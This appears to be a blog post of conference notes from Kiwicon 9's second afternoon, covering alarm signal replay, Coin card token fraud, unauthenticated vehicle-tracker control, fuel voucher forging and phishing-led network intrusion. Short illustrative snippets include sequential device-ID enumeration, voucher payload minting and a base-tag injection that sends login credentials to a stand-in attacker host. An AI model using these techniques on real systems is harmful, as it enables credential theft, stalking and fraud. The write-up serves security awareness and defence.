Kiwicon 9 Day 2 Afternoon

So my notes got a bit sparse here, partly because of a really nice lunch with maaaaaybe one too many espressotinis, but also because apparently taking notes upset someone behind me with a laser pointer. Which, you know, too bad, but it didn’t help.

Also, I’m publishing these less than a week before Kiwicon X, which says a lot about how bad I was at editing the second day’s material.

Talk: Alarming your Neighbours

bitrat & Britta

This talk covered the ways in which security systems suck. The talk stayed in character with the theme of the conference, which was nice.

The team focused on the type of wireless alarm installations that have become very common in rural areas in NZ; some of the models they looked at are heavily advertised on the radio, aimed at farmers concerned about equipment loss. One they called out by name was the Spectra 4000; the more expensive of these options is also the most vulnerable.

They noted some of the basics of alarm systems; for example, the main detectors include reeds, which detect the opening and closing of doors, and PIRs, the infrared detectors used in (for example) motion sensors.

The DSC modules broadcast consistent patterns over radio channels, and the team were able to reverse engineer the signal with a little help from FCC documents for the basic crack, although they noted that each alarm has subtle differences in frequency and data format. Capture, analysis, and playback are done with the assistance of GNU Radio, and they have created GNU Radio flow graphs to help with this.

The result of all this work is pretty cool; with the right replay you can:

  • Lock and unlock the alarm.
  • Prevent the alarm locking.
  • Fake open or close signals from a device.

Essentially rendering the alarm system useless, or sending anyone monitoring it on wild goose chases around their property.

Capture signals, identify known ones, discard the rest. Signal consistency is important.
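To make that loop concrete, here's a toy sketch of the classification step: turning captured pulse widths into bits and matching them against known device preambles. The timings, threshold, and preamble are all invented; in practice they come out of the GNU Radio captures.

```python
# Toy sketch of the classify step: map captured OOK (on-off keying) pulse
# widths to bits, then keep only captures that match a known preamble.
# The threshold, timings, and preamble are invented for illustration;
# real values come from analysing the GNU Radio captures.

def pulses_to_bits(pulse_widths_us, threshold_us=500):
    """Short high pulse -> 0, long high pulse -> 1."""
    return [0 if w < threshold_us else 1 for w in pulse_widths_us]

def matches_known_signal(bits, known_preambles):
    """Discard anything that doesn't start with a known device preamble."""
    return any(bits[:len(p)] == p for p in known_preambles)

capture = [300, 800, 310, 790, 320, 810, 305, 795]  # pulse widths in microseconds
bits = pulses_to_bits(capture)
print(bits)                                        # [0, 1, 0, 1, 0, 1, 0, 1]
print(matches_known_signal(bits, [[0, 1, 0, 1]]))  # True
```

The "signal consistency" point is exactly why this works: if the device always sends the same preamble, a capture either matches a known pattern or gets discarded.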

Naturally there is a GitHub repo.

Talk: Forging a New Identity AKA Begrudgingly Embracing SEO

megahbite

First, this was a gutsy talk and parts obviously weren’t comfortable or easy for Megan.

Second, the talk itself concerned identity, and changing it. Megan noted that there are many reasons to want to change and mask our identities: youthful errors, abuse, political activism, and so on.

The problem is that the Internet never forgets; unlike those of us old enough to have committed our worst online idiocy in the days now lost to the memory holes of DejaNews and AltaVista, anyone starting over today faces a far from trivial problem.

Megan had personal reasons for this talk: she came out as transgender four years ago, and the old identities of trans folk are often used to attack them.

Obfuscation

Being anonymous is increasingly difficult. Even using Tor won’t protect you if you make small mistakes, as Dread Pirate Roberts discovered.

Facebook is now ubiquitous. Not having social media isolates you - and is considered suspicious in and of itself; employers and border guards consider the lack of a Facebook account the sign of a suspicious person. And even if you do avoid them, Facebook and Twitter run shadow profiles.

Happily there is little verification of this data.

  • Work out your unique identifiers.
  • Leave comments on blogs to create multiple new handles.
  • Associate a real name with different handles. This creates a confusing mesh and plausible deniability.
  • Don’t create a wildly different profile. It’s too hard. A lie is most believable when wrapped in some truth.

Creating a new Identity

  • Legally change your name. Easy in NZ, hard in other countries.
  • Prior names will still be on the public record.
  • This is where it gets hard, unfortunately.
  • Utility companies are awful. PayPal are hostile to name changes, as was Telecom (now Spark).
  • Support the new identity with the reverse of the obfuscation techniques above.

Elimination

  • the body…remove the fingerprints…

Summary

  • Nothing is as good as good OpSec…
  • …which is much easier said than done.
  • You need to rely on the discretion of your friends and family, too. It’s a team sport.

Talk: “Coin” up the Khyber

Peter Fillmore

Reversing a Bluetooth payments device. The “Coin” product copies your magstrips and replays them in EFTPOS machines. This is sold as a convenience to users.

“The thing that came after punchcards.” Magstrips were broken in 1992.

Samy Kamkar broke it with a contactless replay device.

What’s in a Coin

Coils, Bluetooth, battery, e-ink.

Respect for the hardware engineers (this looks like it was the well-designed bit), not so much the programmers.

Breaking the Coin

Uses Bluetooth LE. Sniffed with an Ubertooth. Too hard, ask Mike Ryan.

  • Use a root-mode Bluetooth logger on your phone.
  • Inspect in Wireshark.
  • Decompile the app to get the Bluetooth UUIDs the app uses to communicate with the card.
  • Turns out the app is easy to MitM, and editing the app DB lets you load the card with a fake verification.
  • Stripe do the verification. Validate a good card, then load the token against the expired card.
  • Now you can use the bad card’s token to process against the good card.
  • Took half a day.
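The decompile-for-UUIDs step is mostly grep work: GATT service and characteristic UUIDs usually sit in the decompiled source as plain string literals. A rough sketch of scraping them (the sample “decompiled” input below is invented):

```python
import re

# 128-bit UUIDs as they typically appear in decompiled Android sources.
UUID_RE = re.compile(
    r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-"
    r"[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
)

def find_uuids(decompiled_source):
    """Return the unique UUID string literals found in decompiled code."""
    return sorted({m.group(0).lower() for m in UUID_RE.finditer(decompiled_source)})

# Invented sample resembling decompiled output; real UUIDs will differ.
sample = '''
UUID SERVICE = UUID.fromString("0000fff0-0000-1000-8000-00805f9b34fb");
UUID WRITE_CHAR = UUID.fromString("0000FFF1-0000-1000-8000-00805F9B34FB");
'''
print(find_uuids(sample))
```

Once you have the UUIDs, the Wireshark capture of the app’s traffic becomes much easier to read.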

How to fix

  • Validate the track data server side.
  • Don’t embed the ID in the app.
  • Verify the identity of the card submitter.
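The server-side fix boils down to binding each verification token to a fingerprint of the exact track data that was verified, so a token minted for a good card can’t be loaded against a different one. A minimal sketch, with all names and the storage model invented:

```python
import hashlib
import secrets

# Hypothetical server-side token store: each token is bound to a hash of
# the exact track data that was verified, so a token issued for a good
# card is useless against a different (expired/bad) card.
_tokens = {}

def fingerprint(track_data: str) -> str:
    return hashlib.sha256(track_data.encode()).hexdigest()

def issue_token(track_data: str) -> str:
    token = secrets.token_hex(16)
    _tokens[token] = fingerprint(track_data)
    return token

def redeem(token: str, track_data: str) -> bool:
    """Reject the token unless it was issued for this exact card."""
    return _tokens.get(token) == fingerprint(track_data)

good = "good-card-track2-data"
bad = "expired-card-track2-data"
t = issue_token(good)
print(redeem(t, good))  # True
print(redeem(t, bad))   # False: the token can't be moved to another card
```

With that binding in place, the “validate a good card, load the token against the expired card” trick stops working.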

Talk: Hilarious bullshit in Golang

richö butts

richö kicked off by noting a number of things; one was that “my whole talk is performance art”; another was that he’d worked quite a lot with go, was rather familiar with it, and wasn’t interested in listening to a lot of post-talk whining from people upset he’d noticed the warts.

  • Go: Fuck Yourself.
  • Use Go instead of JavaScript for your Hipster startup.

cgo

  • There’s lots of code that exposes a C calling convention.
  • This is a good idea.
  • Go is type and memory safe, so you need tools to do type inference.
  • There are tools for this. Of variable quality.
  • Like shelling out to gcc, causing an error, and parsing the output.
  • The comments are hilarious.
  • Terrible assumptions abound.
  • Includes for C are in comments. Which are magic. You’d think comments are comments, but… NOOOOOOPE.
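For flavour, here’s a toy Python rendition of the magic: the `//` comment block sitting directly above `import "C"` gets pulled out as the C preamble rather than being ignored like a normal comment. This illustrates the rule only; it is not cgo’s actual implementation, which also handles `/* */` blocks and much more.

```python
def extract_cgo_preamble(go_source: str) -> str:
    """Toy version of cgo's rule: the // comments directly above
    `import "C"` are the C preamble, not ordinary comments."""
    lines = go_source.splitlines()
    for i, line in enumerate(lines):
        if line.strip() == 'import "C"':
            preamble = []
            j = i - 1
            while j >= 0 and lines[j].strip().startswith("//"):
                preamble.append(lines[j].strip()[2:].strip())
                j -= 1
            return "\n".join(reversed(preamble))
    return ""

src = '''package main

// #include <stdio.h>
// #include <stdlib.h>
import "C"
'''
print(extract_cgo_preamble(src))
```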

Story Time

  • Tried adding generics.
  • Used the parser.
  • Which aren’t that terrible.
  • Wait, there are three: one for parsing package imports.
  • Go has a go-specific yacc. Which isn’t like any other yacc.
  • A parser to build the other parser.

Reinvent all the wheels

  • Lots of go breakage is justified as “works on Plan 9”.
  • This is silly.

Essentially richö is of the opinion that large chunks of go are an effort to foist a failed OS on the rest of the world in the guise of a programming language.

Dependency Management

  • Thanks to unchecked remote builds, builds can’t be reproduced.
  • It can become literally impossible to ever build your code again if upstream changes.

Talk: A Bitter Story of Aftermarket Vehicle Tracking & Control

Lachlan (skooch) Temple

This talk was incredibly terrifying, and an object lesson that no matter how bad you think the IoT is, it can always get worse. It concerns a car tracker, made by a company called Thinkrace (who also sell child trackers!), which purports to act as an anti-theft device. As we learned, it’s also a very effective stalking device, mayhem-in-traffic device, and maybe even a killing-people-on-the-other-side-of-the-world device.

  • Tracks your car or fleet.
  • A remote-response GPS unit: it uses a SIM to receive commands and GPS to monitor the location, speed, etc.
  • Can be wired up to cut the ignition to kill the car on a remote command.
  • Comes with a web app!
  • The login is the same as the serial number. Passwords are in the clear!
  • The app has GPS, geologging, geofencing - you can monitor someone’s activity, alert when they leave an area, and so on.
  • Google revoked their Maps API key.
  • No auth required for their cloud application. Enter an ID, fill your boots.
  • You can even send vehicle kill commands.
  • This is really bad - if you want to stalk someone, this makes it easy. If you want to cut the engine while they’re on the motorway, you can. It’s too easy.
  • The mobile app is just as terrible.
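To make “enter an ID, fill your boots” concrete: with sequential device IDs and no auth, scraping every tracked vehicle is one loop. The endpoint is mocked out below because the point is the pattern, not the product (and please don’t aim this at real services):

```python
def enumerate_devices(fetch, start_id, count):
    """Walk sequential device IDs against an unauthenticated endpoint.
    `fetch` stands in for an HTTP GET; here it's mocked."""
    found = {}
    for device_id in range(start_id, start_id + count):
        record = fetch(device_id)
        if record is not None:
            found[device_id] = record
    return found

# Mock of the hypothetical cloud API: no credentials checked at all.
_fake_db = {
    1001: {"lat": -41.29, "lon": 174.78},
    1003: {"lat": -36.85, "lon": 174.76},
}
def mock_fetch(device_id):
    return _fake_db.get(device_id)

# Every registered tracker in the ID range, no password needed.
print(enumerate_devices(mock_fetch, 1000, 5))
```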

Talk: Metadata retention law and internet dating in Australia vs New Zealand

nanomebia

Metadata

  • Data about data.
  • There are official definitions in the legislation. 2635 lines.
  • The Australian government wanted dumps for law enforcement.
  • “The online civil libertarians vs everyone else”? Fucking really?
  • Turns out Five Eyes were doing it anyway.
  • Of course, Google et al have been hoovering this up anyway.

Crossover

AU and NZ are sharing anything they can get away with.

“Calm down. Don’t focus on the negatives.”

Kinda didn’t see much value in being condescended to.

There is a Bigger Problem

How do we protect our privacy and find a middle ground?

The “bigger problem” for me with this talk was that the speaker seemed to think that they were talking to a room of dim children. Or trolling. Hard to tell.

Talk: Cyberfuel

Jeremy and Ryan

This is a talk on the wonders and weaknesses of the Z fuel discount voucher system.

  • Numbers were the first effort. Until people started sharing them. Because they could be reused.
  • Even Z were sharing them officially.
  • Their denials of the seriousness of the hack sounded like what you’d say if you didn’t want to change.
  • Turns out the barcodes don’t change when they’re printed. They’re all the same!
  • The barcode increments on date. And they’re unencrypted. Days since the death of Duke Albert I.
  • Discount amount is in plaintext. Number - 50c.
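Which means anyone can mint a voucher. A hedged reconstruction of the scheme (the epoch and field widths below are my own inventions, not the real layout): a plaintext day counter plus a plaintext discount field, and no secret anywhere.

```python
from datetime import date

# Invented stand-in epoch; the real one is a historical in-joke from the
# talk that I haven't tried to reproduce. Field widths are guesses too.
EPOCH = date(2000, 1, 1)

def voucher_payload(on_date, discount_cents):
    """Day counter since the epoch, then the discount in 50c units,
    both in plaintext: anyone can mint a valid-looking voucher."""
    days = (on_date - EPOCH).days
    units = discount_cents // 50
    return f"{days:05d}{units:02d}"

print(voucher_payload(date(2015, 12, 10), 300))  # '0582206'
```

No key, no checksum worth the name: once you know the epoch and the layout, the smartwatch app (or the t-shirt) writes itself.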

Why?

  • Barcode was convenient for cashiers.
  • Now you can pay-at-pump, the vouchers are exploitable at the pump.

Now What?

So you’ve cracked a thing, and a thing that has Real Money associated with it. What do you do? NZITF guidelines are really helpful.

“Don’t tell anyone. This is really hard when you’ve found a thing.”

Z would rather not inconvenience legit customers to lock out crooks. This, I have to say, doesn’t seem unreasonable if the cost of annoying your legitimate customers outweighs the cost of the fraud.

Walking around the pumps with a portable barcode backup system. “This is not suspicious.”

There’s a smartwatch app for that… select a discount amount… generates a backup for you. Or you could, like them, tape out a barcode on your t-shirt and get discounts with it, just the same.

These guys are actually funny. Neat talk, good speakers.

Event: People’s Choice Cyber Talk

Thomas Lim

Blackhat moved into town and were huge arseholes, demanding SyScan move dates (from its long established slot) so Blackhat could have them.

“So I got money from the Chinese to fuck Blackhat Asia.”

The Nihilist’s Guide to Wrecking Humans and Systems

Christina Camilleri (@0xkitty) and Shubs Shah (@infosec_au)

  • Humans have wants and needs and drivers and make judgements.
  • Computers do instructions good.

When we put them together we can produce results which are unexpected when we analyse them in isolation.

We can, for example, play on people’s feelings to have them work around the security of the system. As Christina and Shubs demonstrate, this makes breaking things much, much easier than it would otherwise be.

The Problem

We look at these independently. So we (inadvertently) give the human the ability to break the system.

An Example

  • A phish that asks people to update their healthcare benefits. The email was crafted to come from a spoofed account.
  • People became confused. “What,” they asked, “is wrong?”
  • HR ran up a warning flag in a mass-mailout.
  • And then a couple of days later, so did the infosec team. In a mass-mailout.
  • So Christina masqueraded as Gwen, part of the infosec clean up (since Gwen had helpfully identified herself in the mailout).
  • “You need to download this security patch.”
  • The employee had access to WebSphere MQ Explorer and a bunch of queues, and could execute commands on the queue managers.
  • So the server has access to the source repos via Maven.
  • Which gets to nmap and Jenkins.
  • Jenkins is good news. For hackers.
  • Unauthed Jenkins with access to production is even better news.

Essentially, Christina was able to design a people-engineering strategy that let Shubs start already inside the hardened perimeter, in the soft, gooey centre of the network. Trying to bludgeon in from the outside is harder than being invited in.

So What Goes Wrong

  • People kept trying the phish.
  • We assume trustworthiness.
  • We assume people will not do anything wrong.
  • We over-focus on the perimeter.
  • So we need to focus on the inside of the box, not the outside of the box.
  • Assume your network is compromised.

Another Story

  • Pretend Christina.
  • Pretend Christina was travelling and needed a password reset.
  • She’s terrible at computers. Tee hee.
  • Happily Adam from the helpdesk was really helpful.
  • Since Pretend Christina didn’t have email or a 2FA token, she was hard to help.
  • But Adam got her a temporary token!
  • Adam is so helpful.

  • Pivot to DNS enumeration of interesting servers.
  • Servers full of default Domain/admin or tomcat/tomcat logins.
  • The target was copying user data from prod unobfuscated every week.
  • Storing Twitter credentials for bigcorp in the clear.

What Went Wrong

  • Adam shouldn’t be able to bypass technical controls.
  • The internal network security was terribad.

phish.js

PreyProject

  • XSS on help.preyproject.com
  • Start with a low-grade technical attack and escalate with phishing.
  • Use the help page via a CORS proxy to serve the login page with a doctored base tag and capture credentials.
  • Overlays a login over the help page.
  • Easier than BeEF if you can find XSS on any subdomain.
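The doctored base tag is the neat bit: serve the genuine login page through your proxy, but inject a `<base>` element so every relative URL, including the form action, resolves against the attacker’s host. A string-level sketch with an invented attacker origin:

```python
def doctor_base_tag(html, attacker_origin):
    """Insert a <base> right after <head> so relative URLs -- including
    the login form's action -- resolve against the attacker's server."""
    return html.replace("<head>", f'<head><base href="{attacker_origin}/">', 1)

page = ('<html><head><title>Login</title></head>'
        '<body><form action="session" method="post"></form></body></html>')
doctored = doctor_base_tag(page, "https://evil.example")
print('<base href="https://evil.example/">' in doctored)  # True
```

The victim sees the real page, rendered from the real markup; only the place their credentials go has changed.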

What Are We Doing Wrong

  • Make sure people’s roles marry up with their ability to do stuff.
  • Low level people shouldn’t have high level access.
  • Least priv.
  • Sandbox the browser and mail client.

This was a great talk; for one thing, it shows the degree to which we’re still underestimating the human element of security concerns and, for another, the degree to which we think in terms of a “safe zone” inside a hardened perimeter. It’s really easy to get people to make mistakes, especially if you can tap into their sense of trying to do the right thing (helping an end user, seeing off a phishing attack in the examples here); if you compound that with a security model that assumes people are perfect and the zone inside your perimeter is rock solid, you’re really, really screwed.
